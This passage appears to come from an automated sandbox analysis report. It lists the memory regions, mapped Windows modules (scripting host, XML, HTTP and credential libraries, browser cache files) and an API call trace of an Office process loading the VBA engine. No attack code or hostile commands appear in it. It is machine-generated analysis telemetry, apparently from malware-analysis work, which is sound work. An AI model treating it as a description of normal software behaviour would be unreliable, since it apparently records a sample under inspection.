filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx") Region: id = 553 start_va = 0x9d50000 end_va = 0x9d53fff entry_point = 0x0 region_type = private name = "private_0x0000000009d50000" filename = "" Region: id = 554 start_va = 0x9d60000 end_va = 0x9d63fff entry_point = 0x0 region_type = private name = "private_0x0000000009d60000" filename = "" Region: id = 555 start_va = 0x9d70000 end_va = 0x9d73fff entry_point = 0x0 region_type = private name = "private_0x0000000009d70000" filename = "" Region: id = 556 start_va = 0x9d80000 end_va = 0x9d83fff entry_point = 0x0 region_type = private name = "private_0x0000000009d80000" filename = "" Region: id = 557 start_va = 0x9d90000 end_va = 0x9d93fff entry_point = 0x0 region_type = private name = "private_0x0000000009d90000" filename = "" Region: id = 558 start_va = 0x9da0000 end_va = 0x9da2fff entry_point = 0x0 region_type = private name = "private_0x0000000009da0000" filename = "" Region: id = 559 start_va = 0x9db0000 end_va = 0x9db3fff entry_point = 0x0 region_type = private name = "private_0x0000000009db0000" filename = "" Region: id = 560 start_va = 0x9dc0000 end_va = 0x9dc3fff entry_point = 0x0 region_type = private name = "private_0x0000000009dc0000" filename = "" Region: id = 561 start_va = 0x9dd0000 end_va = 0x9dd3fff entry_point = 0x0 region_type = private name = "private_0x0000000009dd0000" filename = "" Region: id = 562 start_va = 0x9de0000 end_va = 0x9de3fff entry_point = 0x0 region_type = private name = "private_0x0000000009de0000" filename = "" Region: id = 563 start_va = 0x9df0000 end_va = 0x9df3fff entry_point = 0x0 region_type = private name = "private_0x0000000009df0000" filename = "" Region: id = 564 start_va = 0x9e00000 end_va = 0x9e03fff entry_point = 0x0 region_type = private name = "private_0x0000000009e00000" filename = "" Region: id = 565 start_va = 0x9e60000 end_va = 0x9e7afff entry_point = 0x9e96b00 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll") Region: id = 566 start_va = 0x9e80000 end_va = 0x9e81fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009e80000" filename = "" Region: id = 567 start_va = 0x9e90000 end_va = 0x9e9bfff entry_point = 0x9e90000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat") Region: id = 568 start_va = 0x9ea0000 end_va = 0x9ea7fff entry_point = 0x9ea0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 569 start_va = 0x9eb0000 end_va = 0x9ebffff entry_point = 0x9eb0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 570 start_va = 0x7fefc830000 end_va = 0x7fefc88afff entry_point = 0x7fefc830000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 571 start_va = 0xa500000 end_va = 0xa5affff entry_point = 0x0 region_type = private name = "private_0x000000000a500000" filename = "" Region: id = 572 start_va = 0x7fefad30000 end_va = 0x7fefad56fff entry_point = 0x7fefad30000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 573 start_va = 0x7fefad20000 end_va = 0x7fefad2afff entry_point = 0x7fefad20000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 574 start_va = 0x9ec0000 end_va = 0x9edffff entry_point = 0x0 region_type = private name = "private_0x0000000009ec0000" filename = "" Region: id = 575 start_va = 0xe030000 end_va = 0xe372fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000e030000" filename = "" Region: id = 576 start_va = 0x9ee0000 end_va = 0x9f1ffff entry_point = 0x9ee0000 region_type = mapped_file name = "index.dat" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat") Region: id = 577 start_va = 0x7fef2b50000 end_va = 0x7fef2bb1fff entry_point = 0x7fef2b50000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 578 start_va = 0x7fef2b30000 end_va = 0x7fef2b4bfff entry_point = 0x7fef2b30000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 579 start_va = 0x7fefa790000 end_va = 0x7fefa7a0fff entry_point = 0x7fefa790000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 580 start_va = 0xd5d0000 end_va = 0xd6cffff entry_point = 0x0 region_type = private name = "private_0x000000000d5d0000" filename = "" Region: id = 581 start_va = 0xd720000 end_va = 0xd79ffff entry_point = 0x0 region_type = private name = "private_0x000000000d720000" filename = "" Region: id = 582 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 583 start_va = 0x9f20000 end_va = 0x9f20fff entry_point = 0x0 region_type = private name = "private_0x0000000009f20000" filename = "" Region: id = 584 start_va = 0x9f20000 end_va = 0x9f20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000009f20000" filename = "" Region: id = 585 start_va = 0x7fef16c0000 end_va = 0x7fef16c8fff entry_point = 0x7fef16c0000 region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll") Region: id = 586 start_va = 0xd830000 end_va = 0xd92ffff entry_point = 0x0 region_type = private name = "private_0x000000000d830000" filename = "" Region: id = 587 start_va = 0xd970000 end_va = 0xd9effff entry_point = 0x0 region_type = private name = "private_0x000000000d970000" filename = "" Region: id = 588 start_va = 0x7fefc9b0000 end_va = 0x7fefca04fff entry_point = 0x7fefc9b0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 589 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 590 start_va = 0x7fefc3b0000 end_va = 0x7fefc3b6fff entry_point = 0x7fefc3b0000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 591 start_va = 0xd380000 end_va = 0xd45ffff entry_point = 0x0 region_type = private name = "private_0x000000000d380000" filename = "" Region: id = 592 start_va = 0xd4c0000 end_va = 0xd53ffff entry_point = 0x0 region_type = private name = "private_0x000000000d4c0000" filename = "" Region: id = 593 start_va = 0xa630000 end_va = 0xa67ffff entry_point = 0x0 region_type = private name = "private_0x000000000a630000" filename = "" Region: id = 594 start_va = 0x7fef43a0000 end_va = 0x7fef43a7fff entry_point = 0x7fef43a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 595 start_va = 0xde90000 end_va = 0xdf8ffff entry_point = 0x0 region_type = private name = "private_0x000000000de90000" filename = "" Region: id = 596 start_va = 0xdfb0000 end_va = 0xe02ffff entry_point = 0x0 region_type = private name = "private_0x000000000dfb0000" filename = "" Region: id = 597 start_va = 0x7fefb420000 end_va = 0x7fefb434fff entry_point = 0x7fefb420000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 598 start_va = 0x7fffff78000 end_va = 0x7fffff79fff entry_point = 0x0 region_type = private name = "private_0x000007fffff78000" filename = "" Region: id = 599 start_va = 0x7fefb400000 end_va = 0x7fefb418fff entry_point = 0x7fefb400000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 600 start_va = 0x7fefb490000 end_va = 0x7fefb49afff entry_point = 0x7fefb490000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 601 start_va = 0x7fefc9a0000 end_va = 0x7fefc9a6fff entry_point = 0x7fefc9a0000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 602 start_va = 0x7fefabd0000 end_va = 0x7fefac22fff entry_point = 0x7fefabd0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 603 start_va = 0xa640000 end_va = 0xa6bffff entry_point = 0x0 region_type = private name = "private_0x000000000a640000" filename = "" Region: id = 604 start_va = 0x7fefab80000 end_va = 0x7fefab97fff entry_point = 0x7fefab80000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 605 start_va = 0x7fefaba0000 end_va = 0x7fefabb0fff entry_point = 0x7fefaba0000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 606 start_va = 0x9f30000 end_va = 0x9f40fff entry_point = 0x9f30000 region_type = mapped_file name = "c_20127.nls" filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls") Region: id = 607 start_va = 0xe4b0000 end_va = 0xe5affff entry_point = 0x0 region_type = private name = "private_0x000000000e4b0000" filename = "" Region: id = 608 start_va = 0x9f50000 end_va = 0x9f53fff entry_point = 0x0 region_type = private name = "private_0x0000000009f50000" filename = "" Region: id = 609 start_va = 0xa500000 end_va = 0xa503fff entry_point = 0x0 region_type = private name = "private_0x000000000a500000" filename = "" Region: id = 610 start_va = 0xa530000 end_va = 0xa5affff entry_point = 0x0 region_type = private name = "private_0x000000000a530000" filename = "" Region: id = 611 start_va = 0xa510000 end_va = 0xa513fff entry_point = 0x0 region_type = private name = "private_0x000000000a510000" filename = "" Region: id = 612 start_va = 0xa520000 end_va = 0xa523fff entry_point = 0x0 region_type = private name = "private_0x000000000a520000" filename = "" Region: id = 613 start_va = 0xa7c0000 end_va = 0xa8bffff entry_point = 0x0 region_type = private name = "private_0x000000000a7c0000" filename = "" Region: id = 614 start_va = 0xaad0000 end_va = 0xaae5fff entry_point = 0xab4cebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 615 start_va = 0xab20000 end_va = 0xab9ffff entry_point = 0x0 region_type = private name = "private_0x000000000ab20000" filename = "" Region: id = 616 start_va = 0xe380000 end_va = 0xe47ffff entry_point = 0x0 region_type = private name = "private_0x000000000e380000" filename = "" Region: id = 617 start_va = 0x7fef5030000 end_va = 0x7fef5063fff entry_point = 0x7fef5030000 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 618 start_va = 0xa630000 end_va = 0xa633fff entry_point = 0xa630000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 619 start_va = 0xa8c0000 end_va = 0xa8c3fff entry_point = 0xa8c0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 620 start_va = 0xaaf0000 end_va = 0xab1ffff entry_point = 0xaaf0000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000018.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000018.db") Region: id = 621 start_va = 0xad50000 end_va = 0xadb5fff entry_point = 0xad50000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 622 start_va = 0xe750000 end_va = 0xe84ffff entry_point = 0x0 region_type = private name = "private_0x000000000e750000" filename = "" Region: id = 623 start_va = 0x7fffff74000 end_va = 0x7fffff75fff entry_point = 0x0 region_type = private name = "private_0x000007fffff74000" filename = "" Region: id = 624 start_va = 0xd380000 end_va = 0xd3e2fff entry_point = 0x0 region_type = private name = "private_0x000000000d380000" filename = "" Region: id = 625 start_va = 0xd450000 end_va = 0xd45ffff entry_point = 0x0 region_type = private name = "private_0x000000000d450000" filename = "" Region: id = 626 start_va = 0xac20000 end_va = 0xac21fff entry_point = 0x0 region_type = private name = "private_0x000000000ac20000" filename = "" Region: id = 627 start_va = 0xadc0000 end_va = 0xade0fff entry_point = 0x0 region_type = private name = "private_0x000000000adc0000" filename = "" Region: id = 628 start_va = 0xd380000 end_va = 0xd3a0fff entry_point = 0x0 region_type = private name = "private_0x000000000d380000" filename = "" Region: id = 693 start_va = 0x2450000 end_va = 0x2450fff entry_point = 0x0 region_type = private name = "private_0x0000000002450000" filename = "" Region: id = 694 start_va = 0x2ef0000 end_va = 0x2ef3fff entry_point = 0x0 region_type = private name = "private_0x0000000002ef0000" filename = "" Region: id = 695 start_va = 0xac30000 end_va = 0xac3ffff entry_point = 0x0 region_type = private name = "private_0x000000000ac30000" filename = "" Region: id = 696 start_va = 0xaef0000 end_va = 0xb2affff entry_point = 0x0 region_type = private name = "private_0x000000000aef0000" filename = "" Region: id = 697 start_va = 0xac40000 end_va = 0xac4ffff entry_point = 0x0 region_type = private name = "private_0x000000000ac40000" filename = "" Region: id = 698 start_va = 0xb2b0000 end_va = 0xb35afff entry_point = 0xb2b0000 region_type = mapped_file name = "tahoma.ttf" filename = "\\Windows\\Fonts\\tahoma.ttf" (normalized: "c:\\windows\\fonts\\tahoma.ttf") Region: id = 699 start_va = 0xac30000 end_va = 0xac31fff entry_point = 0x0 region_type = private name = "private_0x000000000ac30000" filename = "" Region: id = 700 start_va = 0xac40000 end_va = 0xac40fff entry_point = 0x0 region_type = private name = "private_0x000000000ac40000" filename = "" Region: id = 701 start_va = 0xe5b0000 end_va = 0xe67bfff entry_point = 0xe5b0000 region_type = mapped_file name = "times.ttf" filename = "\\Windows\\Fonts\\times.ttf" (normalized: "c:\\windows\\fonts\\times.ttf") Region: id = 702 start_va = 0xadc0000 end_va = 0xadc1fff entry_point = 0x0 region_type = private name = "private_0x000000000adc0000" filename = "" Region: id = 703 start_va = 0xadd0000 end_va = 0xadd1fff entry_point = 0x0 region_type = private name = "private_0x000000000add0000" filename = "" Region: id = 704 start_va = 0xade0000 end_va = 0xade1fff entry_point = 0x0 region_type = private name = "private_0x000000000ade0000" filename = "" Region: id = 705 start_va = 0xb360000 end_va = 0xb361fff entry_point = 0x0 region_type = private name = "private_0x000000000b360000" filename = "" Region: id = 706 start_va = 0xe680000 end_va = 0xe77ffff entry_point = 0x0 region_type = private name = "private_0x000000000e680000" filename = "" Region: id = 707 start_va = 0xe780000 end_va = 0xe839fff entry_point = 0xe780000 region_type = mapped_file name = "calibril.ttf" filename = "\\Windows\\Fonts\\CalibriL.ttf" (normalized: "c:\\windows\\fonts\\calibril.ttf") Region: id = 708 start_va = 0xb370000 end_va = 0xb371fff entry_point = 0x0 region_type = private name = "private_0x000000000b370000" filename = "" Region: id = 709 start_va = 0xb380000 end_va = 0xb381fff entry_point = 0x0 region_type = private name = "private_0x000000000b380000" filename = "" Region: id = 710 start_va = 0xb390000 end_va = 0xb391fff entry_point = 0x0 region_type = private name = "private_0x000000000b390000" filename = "" Region: id = 711 start_va = 0xb3a0000 end_va = 0xb3a1fff entry_point = 0x0 region_type = private name = "private_0x000000000b3a0000" filename = "" Region: id = 712 start_va = 0xd3b0000 end_va = 0xd3b1fff entry_point = 0x0 region_type = private name = "private_0x000000000d3b0000" filename = "" Region: id = 713 start_va = 0xd3c0000 end_va = 0xd3c1fff entry_point = 0x0 region_type = private name = "private_0x000000000d3c0000" filename = "" Region: id = 714 start_va = 0xd3d0000 end_va = 0xd3d1fff entry_point = 0x0 region_type = private name = "private_0x000000000d3d0000" filename = "" Region: id = 715 start_va = 0xd3e0000 end_va = 0xd3e1fff entry_point = 0x0 region_type = private name = "private_0x000000000d3e0000" filename = "" Region: id = 716 start_va = 0xe840000 end_va = 0xe910fff entry_point = 0xe840000 region_type = mapped_file name = "calibrii.ttf" filename = "\\Windows\\Fonts\\calibrii.ttf" (normalized: "c:\\windows\\fonts\\calibrii.ttf") Region: id = 717 start_va = 0xd3f0000 end_va = 0xd3f1fff entry_point = 0x0 region_type = private name = "private_0x000000000d3f0000" filename = "" Region: id = 718 start_va = 0xd400000 end_va = 0xd401fff entry_point = 0x0 region_type = private name = "private_0x000000000d400000" filename = "" Region: id = 719 start_va = 0xd410000 end_va = 0xd411fff entry_point = 0x0 region_type = private name = "private_0x000000000d410000" filename = "" Region: id = 720 start_va = 0xd420000 end_va = 0xd421fff entry_point = 0x0 region_type = private name = "private_0x000000000d420000" filename = "" Region: id = 721 start_va = 0xd430000 end_va = 0xd431fff entry_point = 0x0 region_type = private name = "private_0x000000000d430000" filename = "" Region: id = 722 start_va = 0xd440000 end_va = 0xd441fff entry_point = 0x0 region_type = private name = "private_0x000000000d440000" filename = "" Region: id = 723 start_va = 0xe920000 end_va = 0xf11ffff entry_point = 0x0 region_type = private name = "private_0x000000000e920000" filename = "" Region: id = 724 start_va = 0x7fee3e00000 end_va = 0x7fee3e53fff entry_point = 0x7fee3e00000 region_type = mapped_file name = "msproof7.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\msproof7.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msproof7.dll") Region: id = 744 start_va = 0x2a30000 end_va = 0x2a31fff entry_point = 0x0 region_type = private name = "private_0x0000000002a30000" filename = "" Region: id = 745 start_va = 0x2f10000 end_va = 0x2f11fff entry_point = 0x0 region_type = private name = "private_0x0000000002f10000" filename = "" Region: id = 746 start_va = 0x2f50000 end_va = 0x2f51fff entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 747 start_va = 0x2f90000 end_va = 0x2f91fff entry_point = 0x0 region_type = private name = "private_0x0000000002f90000" filename = "" Region: id = 748 start_va = 0x2fb0000 end_va = 0x2fd7fff entry_point = 0x2fb0000 region_type = mapped_file name = "c_932.nls" filename = "\\Windows\\System32\\C_932.NLS" (normalized: "c:\\windows\\system32\\c_932.nls") Region: id = 749 start_va = 0x3450000 end_va = 0x3451fff entry_point = 0x0 region_type = private name = "private_0x0000000003450000" filename = "" Region: id = 750 start_va = 0x4640000 end_va = 0x4641fff entry_point = 0x0 region_type = private name = "private_0x0000000004640000" filename = "" Region: id = 751 start_va = 0x4660000 end_va = 0x4661fff entry_point = 0x0 region_type = private name = "private_0x0000000004660000" filename = "" Region: id = 752 start_va = 0x8690000 end_va = 0x8691fff entry_point = 0x0 region_type = private name = "private_0x0000000008690000" filename = "" Region: id = 753 start_va = 0x86b0000 end_va = 0x86b1fff entry_point = 0x0 region_type = private name = "private_0x00000000086b0000" filename = "" Region: id = 754 start_va = 0x8840000 end_va = 0x893ffff entry_point = 0x0 region_type = private name = "private_0x0000000008840000" filename = "" Region: id = 755 start_va = 0xf120000 end_va = 0xfab7fff entry_point = 0xf120000 region_type = mapped_file name = "msmincho.ttc" filename = "\\Windows\\Fonts\\msmincho.ttc" (normalized: "c:\\windows\\fonts\\msmincho.ttc") Region: id = 756 start_va = 0x7fef7440000 end_va = 0x7fef74a3fff entry_point = 0x7fef7440000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 757 start_va = 0x7fef74b0000 end_va = 0x7fef7520fff entry_point = 0x7fef74b0000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 758 start_va = 0x7fffff74000 end_va = 0x7fffff75fff entry_point = 0x0 region_type = private name = "private_0x000007fffff74000" filename = "" Region: id = 759 start_va = 0x7fefc610000 end_va = 0x7fefc619fff entry_point = 0x7fefc610000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 760 start_va = 0x7fefc7a0000 end_va = 0x7fefc7f6fff entry_point = 0x7fefc7a0000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 761 start_va = 0x2450000 end_va = 0x2451fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002450000" filename = "" Region: id = 762 start_va = 0x7fefcb70000 end_va = 0x7fefcbbdfff entry_point = 0x7fefcb70000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 763 start_va = 0xfad0000 end_va = 0xfbcffff entry_point = 0x0 region_type = private name = "private_0x000000000fad0000" filename = "" Region: id = 764 start_va = 0x7fefc4a0000 end_va = 0x7fefc4bafff entry_point = 0x7fefc4a0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 765 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 766 start_va = 0x7fef3c30000 end_va = 0x7fef3d4efff entry_point = 0x7fef3c30000 region_type = mapped_file name = "webservices.dll" filename = "\\Windows\\System32\\webservices.dll" (normalized: "c:\\windows\\system32\\webservices.dll") Region: id = 2352 start_va = 0x89f0000 end_va = 0x8aeffff entry_point = 0x0 region_type = private name = "private_0x00000000089f0000" filename = "" Thread: id = 1 os_tid = 0xa68 Thread: id = 2 os_tid = 0xa50 Thread: id = 3 os_tid = 0xa30 Thread: id = 4 os_tid = 0xa2c Thread: id = 5 os_tid = 0xa28 Thread: id = 6 os_tid = 0xa24 Thread: id = 7 os_tid = 0xa20 Thread: id = 8 os_tid = 0xa1c Thread: id = 9 os_tid = 0xa04 Thread: id = 10 os_tid = 0x9f8 Thread: id = 11 os_tid = 0x9f0 Thread: id = 12 os_tid = 0x9ec Thread: id = 13 os_tid = 0x9e8 Thread: id = 14 os_tid = 0x9dc [0029.302] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0029.302] SetCursor (hCursor=0x10007) returned 0x10007 [0029.302] _set_invalid_parameter_handler (_Handler=0x7fee36e10c8) returned 0x0 [0029.302] wcscpy_s (in: _Destination=0x7265e68, _SizeInWords=0xb, _Source="7.1\\" | out: _Destination="7.1\\") returned 0x0 [0029.302] GetACP () returned 0x4e4 [0029.438] GetModuleHandleExA (in: dwFlags=0x0, lpModuleName=0x7fee3a88f60, phModule=0x7fee3aaf848 | out: phModule=0x7fee3aaf848*=0x7fef8e10000) returned 1 [0029.439] GetProcAddress (hModule=0x7fef8e10000, lpProcName="MsiProvideQualifiedComponentA") returned 0x7fef8e93b3c [0029.439] GetProcAddress (hModule=0x7fef8e10000, lpProcName="MsiGetProductCodeA") returned 0x7fef8e8a13c [0029.439] GetProcAddress (hModule=0x7fef8e10000, lpProcName="MsiReinstallFeatureA") returned 0x7fef8e91618 [0029.440] GetProcAddress (hModule=0x7fef8e10000, lpProcName="MsiProvideComponentA") returned 0x7fef8e8f088 [0029.446] SysStringLen (param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL") returned 0x43 [0029.446] SysStringLen (param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL") returned 0x43 [0029.446] lstrcpyW (in: lpString1=0x2e7330, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL" [0029.446] GetModuleHandleA (lpModuleName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL") returned 0x0 [0029.519] LoadLibraryExA (lpLibFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBEUI.DLL", hFile=0x0, dwFlags=0x8) returned 0x7fee3450000 [0029.635] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1000c0fd0000014e) returned 1 [0029.640] RegisterClipboardFormatA (lpszFormat="VBM_FHwndIsHctl") returned 0xc196 [0029.640] lstrlenA (lpString="") returned 0 [0029.640] lstrcpyA (in: lpString1=0x93b2630, lpString2="" | out: lpString1="") returned="" [0029.640] GetEnvironmentVariableA (in: lpName="DDRYBUR", lpBuffer=0x2e7310, nSize=0x118 | out: lpBuffer="¯\x01") returned 0x0 [0029.640] SetErrorMode (uMode=0x8001) returned 0x8005 [0029.640] GetModuleFileNameA (in: hModule=0x7fee36e0000, lpFilename=0x2e7020, nSize=0x104 | out: lpFilename="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll")) returned 0x42 [0029.640] lstrcpyA (in: lpString1=0x2e6f10, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0029.640] lstrcpyA (in: lpString1=0x2e6f10, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0029.640] lstrcpyA (in: lpString1=0x2e6f10, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0029.640] lstrcpyA (in: lpString1=0x2e6f10, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0029.640] lstrcpyA (in: lpString1=0x2e6f10, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0029.640] lstrcpyA (in: lpString1=0x2e6f10, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\" [0029.640] strcpy_s (in: _Dst=0x2e7130, _DstSize=0x200, _Src="VBE7INTL.DLL" | out: _Dst="VBE7INTL.DLL") returned 0x0 [0029.640] _ultoa_s (in: _Val=0x409, _DstBuf=0x2e6c90, _Size=0x6, _Radix=10 | out: _DstBuf="1033") returned 0x0 [0029.640] strcat_s (in: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\", _SizeInBytes=0x104, _Source="1033" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033") returned 0x0 [0029.640] strcat_s (in: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\1033", _SizeInBytes=0x104, _Source="\\" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft 